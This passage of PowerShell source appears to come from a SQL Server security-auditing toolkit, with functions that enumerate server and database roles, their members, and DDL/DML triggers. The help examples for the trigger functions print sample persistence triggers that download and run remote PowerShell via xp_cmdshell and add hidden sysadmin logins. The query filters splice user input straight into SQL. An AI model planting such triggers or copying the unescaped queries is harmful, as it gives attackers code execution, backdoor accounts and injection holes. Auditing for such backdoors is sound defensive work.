[string]$RolePrincipalName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = "Role owner's name.")] + [string]$RoleOwner, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Setup table for output + $TblServerRoles = New-Object -TypeName System.Data.DataTable + $null = $TblServerRoles.Columns.Add('ComputerName') + $null = $TblServerRoles.Columns.Add('Instance') + $null = $TblServerRoles.Columns.Add('RolePrincipalId') + $null = $TblServerRoles.Columns.Add('RolePrincipalSid') + $null = $TblServerRoles.Columns.Add('RolePrincipalName') + $null = $TblServerRoles.Columns.Add('RolePrincipalType') + $null = $TblServerRoles.Columns.Add('OwnerPrincipalId') + $null = $TblServerRoles.Columns.Add('OwnerPrincipalName') + $null = $TblServerRoles.Columns.Add('is_disabled') + $null = $TblServerRoles.Columns.Add('is_fixed_role') + $null = $TblServerRoles.Columns.Add('create_date') + $null = $TblServerRoles.Columns.Add('modify_Date') + $null = $TblServerRoles.Columns.Add('default_database_name') + + # Setup owner filter + if ($RoleOwner) + { + $RoleOwnerFilter = " AND suser_name(owning_principal_id) like '$RoleOwner'" + } + else + { + $RoleOwnerFilter = '' + } + + # Setup role name + if ($RolePrincipalName) + { + $PrincipalNameFilter = " AND name like '$RolePrincipalName'" + } + else + { + $PrincipalNameFilter = '' + } + } + + Process + { + # Note: Tables queried by this function typically require sysadmin privileges to get all rows + + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Define Query + $Query = "SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + principal_id as [RolePrincipalId], + sid as [RolePrincipalSid], + name as [RolePrincipalName], + type_desc as [RolePrincipalType], + owning_principal_id as [OwnerPrincipalId], + suser_name(owning_principal_id) as [OwnerPrincipalName], + is_disabled, + is_fixed_role, + create_date, + modify_Date, + default_database_name + FROM [master].[sys].[server_principals] WHERE type like 'R' + $PrincipalNameFilter + $RoleOwnerFilter" + + # Execute Query + $TblServerRolesTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Update sid formatting for each entry + $TblServerRolesTemp | + ForEach-Object -Process { + # Format principal sid + $NewSid = [System.BitConverter]::ToString($_.RolePrincipalSid).Replace('-','') + if ($NewSid.length -le 10) + { + $Sid = [Convert]::ToInt32($NewSid,16) + } + else + { + $Sid = $NewSid + } + + # Add results to table + $null = $TblServerRoles.Rows.Add( + [string]$_.ComputerName, + [string]$_.Instance, + [string]$_.RolePrincipalId, + $Sid, + $_.RolePrincipalName, + [string]$_.RolePrincipalType, + [string]$_.OwnerPrincipalId, + [string]$_.OwnerPrincipalName, + [string]$_.is_disabled, + [string]$_.is_fixed_role, + $_.create_date, + $_.modify_Date, + [string]$_.default_database_name) + } + } + + End + { + # Return data + $TblServerRoles + } +} + + +# ---------------------------------- +# Get-SQLServerRoleMember +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLServerRoleMember +{ + <# + .SYNOPSIS + Returns SQL Server role member information from target SQL Servers. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER RolePrincipalName + Role principal name to filter for. + .PARAMETER PrincipalName + Principal name to filter for. + .EXAMPLE + PS C:\> Get-SQLServerRoleMember -Instance SQLServer1\STANDARDDEV2014 -PrincipalName MyUser + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + RolePrincipalId : 3 + RolePrincipalName : sysadmin + PrincipalId : 272 + PrincipalName : MyUser + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + RolePrincipalId : 6 + RolePrincipalName : setupadmin + PrincipalId : 272 + PrincipalName : MyUser + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + RolePrincipalId : 276 + RolePrincipalName : MyCustomRole + PrincipalId : 272 + PrincipalName : MyUser + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLServerRoleMember -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Role name.')] + [string]$RolePrincipalName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL login or Windows account name.')] + [string]$PrincipalName, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Table for output + $TblServerRoleMembers = New-Object -TypeName System.Data.DataTable + + # Setup role name filter + if ($RolePrincipalName) + { + $RoleOwnerFilter = " AND SUSER_NAME(role_principal_id) like '$RolePrincipalName'" + } + else + { + $RoleOwnerFilter = '' + } + + # Setup login name filter + if ($PrincipalName) + { + $PrincipalNameFilter = " AND SUSER_NAME(member_principal_id) like '$PrincipalName'" + } + else + { + $PrincipalNameFilter = '' + } + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Define Query + $Query = " SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance],role_principal_id as [RolePrincipalId], + SUSER_NAME(role_principal_id) as [RolePrincipalName], + member_principal_id as [PrincipalId], + SUSER_NAME(member_principal_id) as [PrincipalName] + FROM sys.server_role_members WHERE 1=1 + $PrincipalNameFilter + $RoleOwnerFilter" + + # Execute Query + $TblServerRoleMembersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Append as needed + $TblServerRoleMembers = $TblServerRoleMembers + $TblServerRoleMembersTemp + } + + End + { + # Return role members + $TblServerRoleMembers + } +} + + +# ---------------------------------- +# Get-SQLDatabaseRole +# ---------------------------------- +# Author: Scott Sutherland +# Reference: https://technet.microsoft.com/en-us/library/ms189612(v=sql.105).aspx +Function Get-SQLDatabaseRole +{ + <# + .SYNOPSIS + Returns database role information from target SQL Servers. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER DatabaseName + Database name to filter for. + .PARAMETER NoDefaults + Only select non default databases. + .PARAMETER RolePrincipalName + Role principalname to filter for. + .PARAMETER RoleOwner + Role owner's name to filter for. + + .EXAMPLE + PS C:\> Get-SQLDatabaseRole -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb -RolePrincipalName DB_OWNER + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DatabaseName : testdb + RolePrincipalId : 16384 + RolePrincipalSid : 01050000000000090400000000000000000000000000000000400000 + RolePrincipalName : db_owner + RolePrincipalType : DATABASE_ROLE + OwnerPrincipalId : 1 + OwnerPrincipalName : sa + is_fixed_role : True + create_date : 4/8/2003 9:10:42 AM + modify_Date : 4/13/2009 12:59:14 PM + default_schema_name : + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLDatabaseRole -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server database name.')] + [string]$DatabaseName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Role name.')] + [string]$RolePrincipalName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = "Role owner's name.")] + [string]$RoleOwner, + + [Parameter(Mandatory = $false, + HelpMessage = 'Only select non default databases.')] + [switch]$NoDefaults, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Setup table for output + $TblDatabaseRoles = New-Object -TypeName System.Data.DataTable + $null = $TblDatabaseRoles.Columns.Add('ComputerName') + $null = $TblDatabaseRoles.Columns.Add('Instance') + $null = $TblDatabaseRoles.Columns.Add('DatabaseName') + $null = $TblDatabaseRoles.Columns.Add('RolePrincipalId') + $null = $TblDatabaseRoles.Columns.Add('RolePrincipalSid') + $null = $TblDatabaseRoles.Columns.Add('RolePrincipalName') + $null = $TblDatabaseRoles.Columns.Add('RolePrincipalType') + $null = $TblDatabaseRoles.Columns.Add('OwnerPrincipalId') + $null = $TblDatabaseRoles.Columns.Add('OwnerPrincipalName') + $null = $TblDatabaseRoles.Columns.Add('is_fixed_role') + $null = $TblDatabaseRoles.Columns.Add('create_date') + $null = $TblDatabaseRoles.Columns.Add('modify_Date') + $null = $TblDatabaseRoles.Columns.Add('default_schema_name') + + # Setup RoleOwner filter + if ($RoleOwner) + { + $RoleOwnerFilter = " AND suser_name(owning_principal_id) like '$RoleOwner'" + } + else + { + $RoleOwnerFilter = '' + } + + # Setup RolePrincipalName filter + if ($RolePrincipalName) + { + $RolePrincipalNameFilter = " AND name like '$RolePrincipalName'" + } + else + { + $RolePrincipalNameFilter = '' + } + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Get list of databases + if($NoDefaults) + { + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose -NoDefaults + } + else + { + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose + } + + # Get role for each database + $TblDatabases | + ForEach-Object -Process { + # Get database name + $DbName = $_.DatabaseName + + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Getting roles from the $DbName database." + } + + # Define Query + $Query = " USE $DbName; + SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + '$DbName' as [DatabaseName], + principal_id as [RolePrincipalId], + sid as [RolePrincipalSid], + name as [RolePrincipalName], + type_desc as [RolePrincipalType], + owning_principal_id as [OwnerPrincipalId], + suser_name(owning_principal_id) as [OwnerPrincipalName], + is_fixed_role, + create_date, + modify_Date, + default_schema_name + FROM [$DbName].[sys].[database_principals] + WHERE type like 'R' + $RolePrincipalNameFilter + $RoleOwnerFilter" + + # Execute Query + $TblDatabaseRolesTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Update sid formatting for each entry and append results + $TblDatabaseRolesTemp | + ForEach-Object -Process { + # Format principal sid + $NewSid = [System.BitConverter]::ToString($_.RolePrincipalSid).Replace('-','') + if ($NewSid.length -le 10) + { + $Sid = [Convert]::ToInt32($NewSid,16) + } + else + { + $Sid = $NewSid + } + + # Add results to table + $null = $TblDatabaseRoles.Rows.Add( + [string]$_.ComputerName, + [string]$_.Instance, + [string]$_.DatabaseName, + [string]$_.RolePrincipalId, + $Sid, + $_.RolePrincipalName, + [string]$_.RolePrincipalType, + [string]$_.OwnerPrincipalId, + [string]$_.OwnerPrincipalName, + [string]$_.is_fixed_role, + $_.create_date, + $_.modify_Date, + [string]$_.default_schema_name) + } + } + } + + End + { + # Return data + $TblDatabaseRoles + } +} + + +# ---------------------------------- +# Get-SQLDatabaseRoleMember +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLDatabaseRoleMember +{ + <# + .SYNOPSIS + Returns database role member information from target SQL Servers. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER DatabaseName + Database name to filter for. + .PARAMETER RolePrincipalName + Role principalname to filter for. + .PARAMETER PrincipalName + Name of principal or Role to filter for. + + .EXAMPLE + PS C:\> Get-SQLDatabaseRoleMember -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb -PrincipalName evil + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DatabaseName : testdb + RolePrincipalId : 16387 + RolePrincipalName : db_ddladmin + PrincipalId : 5 + PrincipalName : evil + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DatabaseName : testdb + RolePrincipalId : 16391 + RolePrincipalName : db_datawriter + PrincipalId : 5 + PrincipalName : evil + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLDatabaseRoleMember -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server database name.')] + [string]$DatabaseName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Role name.')] + [string]$RolePrincipalName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL login or Windows account name.')] + [string]$PrincipalName, + + [Parameter(Mandatory = $false, + HelpMessage = 'Only select non default databases.')] + [switch]$NoDefaults, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Table for output + $TblDatabaseRoleMembers = New-Object -TypeName System.Data.DataTable + + # Setup login filter + if ($PrincipalName) + { + $PrincipalNameFilter = " AND USER_NAME(member_principal_id) like '$PrincipalName'" + } + else + { + $PrincipalNameFilter = '' + } + + # Setup role name + if ($RolePrincipalName) + { + $RolePrincipalNameFilter = " AND USER_NAME(role_principal_id) like '$RolePrincipalName'" + } + else + { + $RolePrincipalNameFilter = '' + } + } + + Process + { + # Note: Tables queried by this function typically require sysadmin or DBO privileges. + + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Get list of databases + if($NoDefaults) + { + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -NoDefaults -SuppressVerbose + } + else + { + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose + } + + # Get roles for each database + $TblDatabases | + ForEach-Object -Process { + # Get database name + $DbName = $_.DatabaseName + + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Getting role members for the $DbName database..." + } + + # Define Query + $Query = " USE $DbName; + SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + '$DbName' as [DatabaseName], + role_principal_id as [RolePrincipalId], + USER_NAME(role_principal_id) as [RolePrincipalName], + member_principal_id as [PrincipalId], + USER_NAME(member_principal_id) as [PrincipalName] + FROM [$DbName].[sys].[database_role_members] + WHERE 1=1 + $RolePrincipalNameFilter + $PrincipalNameFilter" + + # Execute Query + $TblDatabaseRoleMembersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Append results + $TblDatabaseRoleMembers = $TblDatabaseRoleMembers + $TblDatabaseRoleMembersTemp + } + } + + End + { + # Return data + $TblDatabaseRoleMembers + } +} + + +# ---------------------------------- +# Get-SQLTriggerDdl +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLTriggerDdl +{ + <# + .SYNOPSIS + Returns DDL trigger information from target SQL Servers. This includes logon triggers. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER TriggerName + Trigger name to filter for. + .EXAMPLE + PS C:\> Get-SQLTriggerDdl -Instance SQLServer1\STANDARDDEV2014 + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + TriggerName : persistence_ddl_1 + TriggerId : 1104722988 + TriggerType : SERVER + ObjectType : SQL_TRIGGER + ObjectClass : SERVER + TriggerDefinition : -- Create the DDL trigger + CREATE Trigger [persistence_ddl_1] + ON ALL Server + FOR DDL_LOGIN_EVENTS + AS + + -- Download and run a PowerShell script from the internet + EXEC master..xp_cmdshell 'Powershell -c "IEX(new-object + net.webclient).downloadstring(''https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/trigger_demo_ddl.ps1'')"'; + + -- Add a sysadmin named 'SysAdmin_DDL' if it doesn't exist + if (SELECT count(name) FROM sys.sql_logins WHERE name like 'SysAdmin_DDL') = 0 + + -- Create a login + CREATE LOGIN SysAdmin_DDL WITH PASSWORD = 'Password123!'; + + -- Add the login to the sysadmin fixed server role + EXEC sp_addsrvrolemember 'SysAdmin_DDL', 'sysadmin'; + + create_date : 4/26/2016 8:34:49 PM + modify_date : 4/26/2016 8:34:49 PM + is_ms_shipped : False + is_disabled : False + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Get-SQLTriggerDdl -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Trigger name.')] + [string]$TriggerName, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Table for output + $TblDdlTriggers = New-Object -TypeName System.Data.DataTable + + # Setup role name + if ($TriggerName) + { + $TriggerNameFilter = " AND name like '$TriggerName'" + } + else + { + $TriggerNameFilter = '' + } + } + + Process + { + # Note: Tables queried by this function typically require sysadmin privileges to get all rows. + + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Define Query + $Query = " SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + name as [TriggerName], + object_id as [TriggerId], + [TriggerType] = 'SERVER', + type_desc as [ObjectType], + parent_class_desc as [ObjectClass], + OBJECT_DEFINITION(OBJECT_ID) as [TriggerDefinition], + create_date, + modify_date, + is_ms_shipped, + is_disabled + FROM [master].[sys].[server_triggers] WHERE 1=1 + $TriggerNameFilter" + + # Execute Query + $TblDdlTriggersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Append results + $TblDdlTriggers = $TblDdlTriggers + $TblDdlTriggersTemp + } + + End + { + # Return data + $TblDdlTriggers + } +} + + +# ---------------------------------- +# Get-SQLTriggerDml +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLTriggerDml +{ + <# + .SYNOPSIS + Returns DML trigger information from target SQL Servers. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DatabaseName + Database name to filter for. + .PARAMETER TriggerName + Trigger name to filter for. + .EXAMPLE + PS C:\> Get-SQLTriggerDml -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DatabaseName : testdb + TriggerName : persistence_dml_1 + TriggerId : 565577053 + TriggerType : DATABASE + ObjectType : SQL_TRIGGER + ObjectClass : OBJECT_OR_COLUMN + TriggerDefinition : -- Create trigger + CREATE TRIGGER [persistence_dml_1] + ON testdb.dbo.NOCList + FOR INSERT, UPDATE, DELETE AS + + -- Impersonate sa + EXECUTE AS LOGIN = 'sa' + + -- Download a PowerShell script from the internet to memory and execute it + EXEC master..xp_cmdshell 'Powershell -c "IEX(new-object + net.webclient).downloadstring(''https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/trigger_demo_dml.ps1'')"'; + + -- Add a sysadmin named 'SysAdmin_DML' if it doesn't exist + if (select count(*) from sys.sql_logins where name like 'SysAdmin_DML') = 0 + + -- Create a login + CREATE LOGIN SysAdmin_DML WITH PASSWORD = 'Password123!'; + + -- Add the login to the sysadmin fixed server role + EXEC sp_addsrvrolemember 'SysAdmin_DML', 'sysadmin'; + + create_date : 4/26/2016 8:58:28 PM + modify_date : 4/26/2016 8:58:28 PM + is_ms_shipped : False + is_disabled : False + is_not_for_replication : False + is_instead_of_trigger : False + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Get-SQLTriggerDml -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server database name.')] + [string]$DatabaseName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Trigger name.')] + [string]$TriggerName, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Table for output + $TblDmlTriggers = New-Object -TypeName System.Data.DataTable + + # Setup login filter + if ($TriggerName) + { + $TriggerNameFilter = " AND name like '$TriggerName'" + } + else + { + $TriggerNameFilter = '' + } + } + + Process + { + # Note: Tables queried by this function typically require sysadmin privileges to get all rows. + + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose -Message "$Instance : Grabbing DML triggers from the databases below:." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Get list of databases + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose + + # Get role for each database + $TblDatabases | + ForEach-Object -Process { + # Get database name + $DbName = $_.DatabaseName + + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : - $DbName" + } + + # Define Query + $Query = " use [$DbName]; + SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + '$DbName' AS [DatabaseName], + SCHEMA_NAME(o.schema_id) AS [SchemaName], + t.name AS [TriggerName], + t.object_id AS [TriggerId], + [TriggerType] = 'DATABASE', + t.type_desc AS [ObjectType], + t.parent_class_desc AS [ObjectClass], + OBJECT_DEFINITION(t.object_id) AS [TriggerDefinition], + t.create_date, + t.modify_date, + t.is_ms_shipped, + t.is_disabled, + t.is_not_for_replication, + t.is_instead_of_trigger + FROM + [sys].[triggers] t + INNER JOIN + [sys].[objects] o ON t.parent_id = o.object_id + WHERE 1=1 $TriggerNameFilter" + + # Execute Query + $TblDmlTriggersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Append results + $TblDmlTriggers = $TblDmlTriggers + $TblDmlTriggersTemp + } + } + + End + { + # Return data + $TblDmlTriggers + } +} + + +# ---------------------------------- +# Get-SQLStoredProcedureCLR +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLStoredProcedureCLR +{ + <# + .SYNOPSIS + Returns stored procedures created from CLR assemblies for each accessible database. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER DatabaseName + Database name to filter for. + .PARAMETER DatabaseUser + Database user to filter for. + .PARAMETER NoDefaults + Only show information for non default databases. + .PARAMETER ExportFolder + Folder to export CLR DLL files to. + .PARAMETER AssemblyName + Filter for assembly names that contain the provided word. + + .EXAMPLE + Get CLR stored procedure information and export source DLLs to a folder as a sysadmin. + PS C:\> Get-SQLStoredProcedureCLR -Verbose -Instance SQLServer1\Instance1 -ExportFolder . | ft -AutoSize + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Grabbing assembly file information from master. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Creating export folder: .\CLRExports + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Creating server folder: .\CLRExports\MSSQLSRV04_SQLSERVER2014 + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Creating database folder: .\CLRExports\MSSQLSRV04_SQLSERVER2014\master + VERBOSE: MSSQLSRV04\SQLSERVER2014 : - Exporting adduser.dll + VERBOSE: MSSQLSRV04\SQLSERVER2014 : - Exporting CLRFile.dll + VERBOSE: MSSQLSRV04\SQLSERVER2014 : - 